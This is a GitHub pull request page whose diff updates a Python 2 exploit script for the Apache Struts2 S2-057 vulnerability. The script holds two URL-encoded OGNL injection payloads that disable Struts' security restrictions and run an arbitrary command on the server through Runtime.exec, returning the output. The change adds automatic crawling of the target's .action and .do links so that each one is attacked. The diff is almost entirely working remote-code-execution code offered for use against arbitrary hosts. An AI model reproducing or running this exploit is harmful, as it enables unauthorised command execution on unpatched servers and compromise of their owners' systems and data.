Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Feat/fix exp #4

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Feat/fix exp #4

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
4176848
不知到路径的时候能枚举所有路径
Jul 23, 2019
f744880
enumerate action path
Jul 23, 2019
b42a668
emurate action path
Jul 23, 2019
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 7 additions & 0 deletions .idea/misc.xml
View file
Open in desktop

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

8 changes: 8 additions & 0 deletions .idea/modules.xml
View file
Open in desktop

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

11 changes: 11 additions & 0 deletions .idea/struts2-057-exp.iml
View file
Open in desktop

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

6 changes: 6 additions & 0 deletions .idea/vcs.xml
View file
Open in desktop

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

143 changes: 143 additions & 0 deletions .idea/workspace.xml
View file
Open in desktop

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

60 changes: 42 additions & 18 deletions s2_057_exp.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,29 +2,53 @@
#author: 360云影实验室 (icematcha@360Yunyinglab, [email protected])
import requests
import sys
from urlparse import urljoin, urlparse
import re

def expliot(host, command, path):
payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+ command +'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+command+'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'

url = host+payload+path
url1 = host+payload1+path
def gen_paylaod(uri, payload):
prefix = '/'.join(uri.split('/')[:-1])
urlpack = urlparse(sys.argv[1].strip())
url = urlpack.scheme + '://' + urlpack.netloc + prefix + '/' + payload + uri.split(prefix)[1]
return url

res = requests.get(url, allow_redirects=False)
res1 = requests.get(url1, allow_redirects=False)
def expliot(host , command):
def get_all_actions(host):
resp = requests.get(host).content
match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:action|do))''', resp)
return match

if res.status_code == 200 and res1.status_code != 200:
print "Exploit successful:"
print res.content
elif res1.status_code == 200 and res.status_code != 200:
print "Exploit successful:"
print res1.content
else:
print('The target is likely unvulnerable,mabye your struts2 version is too high!')
link_list = get_all_actions(host)

payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+ command +'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D'
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+command+'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D'

for _uri in link_list:
try:
payload_url = gen_paylaod(_uri , payload)
payload_url1 = gen_paylaod(_uri , payload1)

res = requests.get(payload_url, allow_redirects=False)
res1 = requests.get(payload_url1, allow_redirects=False)
if res.status_code == 200 and res1.status_code != 200:
return res.content
elif res1.status_code == 200 and res.status_code != 200:
return res.content
else:
pass
except Exception as e:
print e
return None


if __name__ == '__main__':
if len(sys.argv) < 4:
print("Usage: python s2-057-exp.py http://www.xxx.com/ {command} {The path such as:actionChain1.action}")
if len(sys.argv) < 3:
print("Usage: python s2-057-exp.py http://www.xxx.com/ {command}")
else:
expliot(sys.argv[1].strip(), sys.argv[2], sys.argv[3].strip())
res = expliot(sys.argv[1].strip(), sys.argv[2])
if res:
print "Exploit successful:"
print res
else:
print('The target is likely unvulnerable,mabye your struts2 version is too high!')